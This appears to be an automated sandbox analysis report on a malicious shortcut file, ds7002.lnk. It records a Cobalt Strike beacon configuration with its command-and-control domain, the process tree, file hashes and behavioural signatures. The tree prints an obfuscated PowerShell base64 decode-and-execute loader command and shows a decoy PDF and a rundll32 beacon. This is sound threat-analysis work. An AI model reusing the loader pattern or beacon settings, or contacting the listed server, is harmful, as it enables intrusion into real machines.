Analysis
- max time kernel: 80s
- max time network: 140s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 26-12-2020 20:45

Static task: static1
Behavioral task: behavioral1
- Sample: ds7002.lnk
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: ds7002.lnk
- Resource: win10v20201028
General
- Target: ds7002.lnk
- Size: 392KB
- MD5: 6ed0020b0851fb71d5b0076f4ee95f3c
- SHA1: e431261c63f94a174a1308defccc674dabbe3609
- SHA256: 2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
- SHA512: 2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted: cobaltstrike
http://pandorasong.com:443/access/
- access_type: 512
- beacon_type: 2048
- create_remote_thread: 0
- day: 0
- dns_idle: 0
- dns_sleep: 0
- host: pandorasong.com,/access/
- http_header1:
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- http_header2:
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- http_method1: GET
- http_method2: POST
- injection_process: (empty)
- jitter: 4352
- maxdns: 255
- month: 0
- pipe_name: \\%s\pipe\msagent_%x
- polling_time: 300000
- port_number: 443
- proxy_password: (empty)
- proxy_server: (empty)
- proxy_username: (empty)
- sc_process32: %windir%\syswow64\rundll32.exe
- sc_process64: %windir%\sysnative\rundll32.exe
- state_machine:
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown1: 7.382016e+08
- unknown2:
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown3: 0
- unknown4: 0
- unknown5: 2.350256387e+09
- uri: /radio/xmlrpc/v45
- user_agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- year: 0
Signatures
- Cobaltstrike
  Detected malicious payload which is part of Cobaltstrike.
- Blocklisted process makes network request (1 IoC)
  Processes: flow 11, pid 3280, rundll32.exe
- Loads dropped DLL (1 IoC)
  Processes: pid 3280, rundll32.exe
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: AcroRd32.exe
    Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
- Modifies Internet Explorer settings
  Processes: AcroRd32.exe
    Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
- Modifies registry class (1 IoC)
  Processes: powershell.exe
    Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings
- Suspicious behavior: EnumeratesProcesses (25 IoCs)
  Processes: pid 3712 powershell.exe (5 entries); pid 3224 AcroRd32.exe (20 entries)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: pid 3712 powershell.exe, Token: SeDebugPrivilege
- Suspicious use of FindShellTrayWindow (1 IoC)
  Processes: pid 3224 AcroRd32.exe
- Suspicious use of SetWindowsHookEx (6 IoCs)
  Processes: pid 3224 AcroRd32.exe (6 entries)
- Suspicious use of WriteProcessMemory (268 IoCs)
  Processes: cmd.exe, powershell.exe, csc.exe, csc.exe, AcroRd32.exe, RdrCEF.exe
  Parent PID / process wrote to memory of target PID / process (the report repeats each relationship many times; distinct pairs listed here):
    1192 cmd.exe -> 3712 powershell.exe
    3712 powershell.exe -> 864 csc.exe
    864 csc.exe -> 504 cvtres.exe
    3712 powershell.exe -> 2912 csc.exe
    2912 csc.exe -> 1452 cvtres.exe
    3712 powershell.exe -> 3224 AcroRd32.exe
    3712 powershell.exe -> 3280 rundll32.exe
    3224 AcroRd32.exe -> 864 RdrCEF.exe
    864 RdrCEF.exe -> 2820 RdrCEF.exe
    864 RdrCEF.exe -> 720 RdrCEF.exe
Processes (indentation shows the parent/child tree)
- C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='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';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
    Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BEE.tmp" "c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\CSC5A2DD784BD9D45A98611C5537A8A7859.TMP"
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DA4.tmp" "c:\Users\Admin\AppData\Local\Temp\zop2j04m\CSC1CF7842663148D6AD4940A97A63AE11.TMP"
    - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
      Signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=47DAFD1037BFF6814912688784990307 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=47DAFD1037BFF6814912688784990307 --renderer-client-id=2 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job /prefetch:1
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62CC0C764F90EE5DD0B5128877C4F9B0 --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FA72FAA5A5B5CBE943BCE6F0E789EA20 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FA72FAA5A5B5CBE943BCE6F0E789EA20 --renderer-client-id=4 --mojo-platform-channel-handle=2088 --allow-no-sandbox-job /prefetch:1
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7E5C290B08D1BA219AE472F5319370FD --mojo-platform-channel-handle=2484 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CF73B682716656EE8F17D52C0930EFC5 --mojo-platform-channel-handle=2080 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DF60E2F47A1AAA115DE27723D1655990 --mojo-platform-channel-handle=2564 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - C:\Windows\system32\rundll32.exe
      Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
      Signatures: Blocklisted process makes network request; Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.dll
  MD5: 3a216209910162c6c313f5e39c72ab72
  SHA1: 13a813d2d658ba8ead3ace67197bc7b396724cd8
  SHA256: 63ec074483787e76ccf864f8e9606ba54050287906d77301c84a28cd9270fc7c
  SHA512: c6af206d2807230e9de74f5b69574dd1f77d44e604f8d96f007ebe6b079e077ecc8f57fa8046d240e16ba2b29cd55e397aa3beb5fad3d5b6b476183e413d1b42
- C:\Users\Admin\AppData\Local\Temp\RES6BEE.tmp
  MD5: 8ea2811a92592f13205304d3f47136e0
  SHA1: 2e5aa2ef235f99848e29f310955844c55f1f7ae4
  SHA256: ce581893d475bbad2aed1cc7f7fa4431e94192f7540f2f1f89b57c57d43469e7
  SHA512: f2c00025b083311a7d8e3b13be0b0cfbbe801cd78e2e1ac924bacb11b93070422c77976902f47fa30d8242cccc6a765917ed81161c0997e3bdb1b8bafc11f088
- C:\Users\Admin\AppData\Local\Temp\RES6DA4.tmp
  MD5: c604c113370c146557a6b96a525f8f71
  SHA1: fded3d2e1dc4301a97ee816166d55e64d139076d
  SHA256: 28536c853cf14a0029abc584d4159e66e0e499efd64a3b45eb0c6816b8be41a2
  SHA512: b188f38531d19fa01506590b7043409b2efd003fabad242ead3821bfe1dc07931ee7fc663c7ae2414db48cb6f8e541e62f4d2c4b0344c99ae36d6ecfb0d66906
- C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
  MD5: 313f4808aa2a2073005d219bc68971cd
  SHA1: 053fb60530e884851eb8b6aebbec4570ec788d4a
  SHA256: b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
  SHA512: 1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
- C:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.dll
  MD5: d9fac1cadeb75f7a736ab19e574a6770
  SHA1: 7736b0605a5ecf3e0820da31871f9677b16cfdb7
  SHA256: deb20509a1bba2bcd374c95774c2600520abe15ab0b56c706c83631025fe11fe
  SHA512: c2aa0ab77a9fb02b7d335d56dbac4042817b2e5167ed007dc4528189aa1ca09be5997c7c1fe9ae8be8642fa506ef8dad65b07e1d23bc9423289d8231421a0980
- C:\Users\Admin\AppData\Local\cyzfc.dat
  MD5: 16bbc967a8b6a365871a05c74a4f345b
  SHA1: 9858d5cb2a6614be3c48e33911bf9f7978b441bf
  SHA256: b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
  SHA512: 68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
- \??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.0.cs
  MD5: cdcb629e6587254315606a6ba3764745
  SHA1: d5b706ca48b7af8926926e80565148f725c75393
  SHA256: 3c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
  SHA512: 29f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
- \??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.cmdline
  MD5: 54acfa68a7d3b92bc7a9cf902a677226
  SHA1: 13c6b985e804ae204c6d12408e626113b7e8ca14
  SHA256: 23aead978c8efa77f68aaec6da07a83455d55bd981503efb6c9c95498321813e
  SHA512: 375c14c22be9ae66a459d33b670076889614f3073897a7c8da1874f0ccc91eff711b69fc2bac14f8602eff3f67a895f4565571e8f288abb3b3fcce14271e67bc
- \??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\CSC5A2DD784BD9D45A98611C5537A8A7859.TMP
  MD5: ea535899391ce9d8616a881242fae1b4
  SHA1: 877be9c1e74bf2cecc223358e944eb8f96efcb35
  SHA256: dcc959bdf4587a73912d7b272a481202d39ca268cf05d914fd7995a89d323ce5
  SHA512: 609d1e6a5a2ca7d03e92b806fc176c29abde2f4d3ce7051b1bf63b4ff8b0c0b92bcd66bae415e65b238c1501c8735bb27bc997d32d8c77695ff16ad183f0479a
- \??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\CSC1CF7842663148D6AD4940A97A63AE11.TMP
  MD5: 7501e65132906f5c5e0e5c0db3db1915
  SHA1: c70c7c523a54fc2bdf3c0679409f4039c2119c92
  SHA256: 9715ddfc28f01049fbd55c573bf31a8d3ffae0598a1e2147026a017c5374397b
  SHA512: 4b83980c715dbb423ffbefd3f923284cae651412fb9e36f11a6d64619d214dbbb32cb6fec31efa2c784c084baf4cbcd30337f1edf9aed122640be6e75ebee6dc
- \??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.0.cs
  MD5: 171a88ab4fad87acfd2e5032eb0c6113
  SHA1: 754de0e7656c558d335710fc41cbf196d39c1a19
  SHA256: 5473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
  SHA512: 87ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
- \??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.cmdline
  MD5: 763b35b76bfc8ae659da5095ed42d98a
  SHA1: e451a7a9847739bb59c5c54439b7254f29287b14
  SHA256: a461f368bddef81fddda3f0247b7a4e462827aaec3121ed66f251d11c02b3b3b
  SHA512: 42e3128b5287583a2a45de1832891ee40e3ccc2391656e315438f89d4fce048f429e40e8dd2654855b9d3bc6854bb077b80e192bebae9d56ced0047a5ed6724a
- \Users\Admin\AppData\Local\cyzfc.dat
  MD5: 16bbc967a8b6a365871a05c74a4f345b
  SHA1: 9858d5cb2a6614be3c48e33911bf9f7978b441bf
  SHA256: b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
  SHA512: 68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
- memory/504-9-0x0000000000000000-mapping.dmp
- memory/504-46-0x00000000778B2000-0x00000000778B200C-memory.dmp (Filesize: 12B)
- memory/504-47-0x0000000000000000-mapping.dmp
- memory/720-32-0x00000000778B2000-0x00000000778B200C-memory.dmp (Filesize: 12B)
- memory/720-34-0x0000000000000000-mapping.dmp
- memory/864-29-0x0000000000000000-mapping.dmp
- memory/864-6-0x0000000000000000-mapping.dmp
- memory/1452-17-0x0000000000000000-mapping.dmp
- memory/2004-50-0x0000000000000000-mapping.dmp
- memory/2004-49-0x00000000778B2000-0x00000000778B200C-memory.dmp (Filesize: 12B)
- memory/2820-31-0x0000000000000000-mapping.dmp
- memory/2820-30-0x00000000778B2000-0x00000000778B200C-memory.dmp (Filesize: 12B)
- memory/2912-14-0x0000000000000000-mapping.dmp
- memory/3224-22-0x0000000000000000-mapping.dmp
- memory/3280-28-0x0000023196660000-0x00000231966DE000-memory.dmp (Filesize: 504KB)
- memory/3280-27-0x0000023196620000-0x0000023196660000-memory.dmp (Filesize: 256KB)
- memory/3280-23-0x0000000000000000-mapping.dmp
- memory/3712-13-0x000001DA50540000-0x000001DA50541000-memory.dmp (Filesize: 4KB)
- memory/3712-2-0x0000000000000000-mapping.dmp
- memory/3712-4-0x000001DA357E0000-0x000001DA357E1000-memory.dmp (Filesize: 4KB)
- memory/3712-3-0x00007FFE217B0000-0x00007FFE2219C000-memory.dmp (Filesize: 9.9MB)
- memory/3712-5-0x000001DA505C0000-0x000001DA505C1000-memory.dmp (Filesize: 4KB)
- memory/3712-21-0x000001DA50550000-0x000001DA50551000-memory.dmp (Filesize: 4KB)
- memory/3804-38-0x00000000778B2000-0x00000000778B200C-memory.dmp (Filesize: 12B)
- memory/3804-39-0x0000000000000000-mapping.dmp
- memory/3948-44-0x0000000000000000-mapping.dmp
- memory/3948-43-0x00000000778B2000-0x00000000778B200C-memory.dmp (Filesize: 12B)